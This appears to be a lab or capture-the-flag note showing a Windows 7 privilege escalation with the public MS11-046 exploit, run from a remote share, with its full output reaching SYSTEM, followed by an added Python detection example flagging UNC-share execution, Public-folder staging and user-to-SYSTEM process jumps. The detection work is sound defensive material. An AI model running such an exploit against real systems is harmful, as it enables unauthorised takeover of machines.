4 privesc_2 ms11-046

Using https://github.com/abatchy17/WindowsExploits/tree/master/MS11-046

c:\Users\Public\Downloads> \\10.10.14.2\drive\MS11-046.exe

c:\Windows\System32> whoami
nt authority\system
exit

# exploit output, shown only after exiting the spawned SYSTEM shell
[*] MS11-046 (CVE-2011-1249) x86 exploit
   [*] by Tomislav Paskalev
[*] Identifying OS
   [+] 32-bit
   [+] Windows 7
[*] Locating required OS components
   [+] ntkrnlpa.exe
      [*] Address:      0x8281b000
      [*] Offset:       0x00850000
      [+] HalDispatchTable
         [*] Offset:    0x009793b8
   [+] NtQueryIntervalProfile
      [*] Address:      0x77535510
   [+] ZwDeviceIoControlFile
      [*] Address:      0x77534ca0
[*] Setting up exploitation prerequisite
   [*] Initialising Winsock DLL
      [+] Done
      [*] Creating socket
         [+] Done
         [*] Connecting to closed port
            [+] Done
[*] Creating token stealing shellcode
   [*] Shellcode assembled
   [*] Allocating memory
      [+] Address:      0x02070000
      [*] Shellcode copied
[*] Exploiting vulnerability
   [*] Sending AFD socket connect request
      [+] Done
      [*] Elevating privileges to SYSTEM
         [+] Done
         [*] Spawning shell
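The session above leaves a recognisable trace in process-creation telemetry: a binary launched straight from a remote UNC share, a working directory under C:\Users\Public, and a child process running as NT AUTHORITY\SYSTEM whose parent runs as an ordinary user. The following is an added detection example, not code from the page or from the linked exploit repository; the Sysmon-style event records, process IDs and the account name WIN7\lowpriv are constructed for the example.

```python
"""Heuristics for the execution pattern in the MS11-046 session above (added example)."""
import re
from dataclasses import dataclass

SYSTEM_ACCOUNT = "nt authority\\system"
UNC_PATH = re.compile(r"^\\\\[^\\]+\\")                     # \\host\share\...
PUBLIC_DIR = re.compile(r"^c:\\users\\public\\", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    """Simplified subset of a Sysmon Event ID 1 (process create) record."""
    pid: int
    ppid: int
    image: str   # full path of the executable
    cwd: str     # CurrentDirectory field
    user: str    # account the process runs as


def is_system(user: str) -> bool:
    return user.lower() == SYSTEM_ACCOUNT


def detect(events):
    """Return (rule, pid) findings for the three heuristics, in event order."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        # Rule 1: executable image lives on a network share (never staged on disk).
        if UNC_PATH.match(e.image):
            findings.append(("exec_from_unc_share", e.pid))
        # Rule 2: payload staged in or run from the world-writable Public profile.
        if PUBLIC_DIR.match(e.image) or PUBLIC_DIR.match(e.cwd):
            findings.append(("exec_from_public_dir", e.pid))
        # Rule 3: a SYSTEM child whose parent is a non-SYSTEM process. Legitimate
        # elevation goes through services.exe / svchost.exe (already SYSTEM), so a
        # direct jump from a user-level parent is the token-theft signature.
        parent = by_pid.get(e.ppid)
        if parent is not None and is_system(e.user) and not is_system(parent.user):
            findings.append(("privilege_jump_to_system", e.pid))
    return findings


# Constructed sample events modelled on the session above (not captured logs).
SAMPLE_EVENTS = [
    ProcEvent(900, 800, r"C:\Windows\explorer.exe", r"C:\Users\lowpriv", r"WIN7\lowpriv"),
    ProcEvent(1200, 900, r"C:\Windows\System32\cmd.exe", r"C:\Users\lowpriv", r"WIN7\lowpriv"),
    ProcEvent(1304, 1200, r"\\10.10.14.2\drive\MS11-046.exe",
              r"C:\Users\Public\Downloads", r"WIN7\lowpriv"),
    ProcEvent(1340, 1304, r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32", r"NT AUTHORITY\SYSTEM"),
    # Benign SYSTEM process whose parent (services.exe, pid 600) is outside the
    # sample window: rule 3 must stay quiet when the parent is unknown.
    ProcEvent(1400, 600, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32", r"NT AUTHORITY\SYSTEM"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:28s} pid={pid}")
```

Rule 3 is the one worth keeping even after the MS11-046 patch is deployed, since any kernel token-stealing exploit produces the same parent/child account mismatch; rules 1 and 2 are cheap staging indicators that also catch ordinary payload drops.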
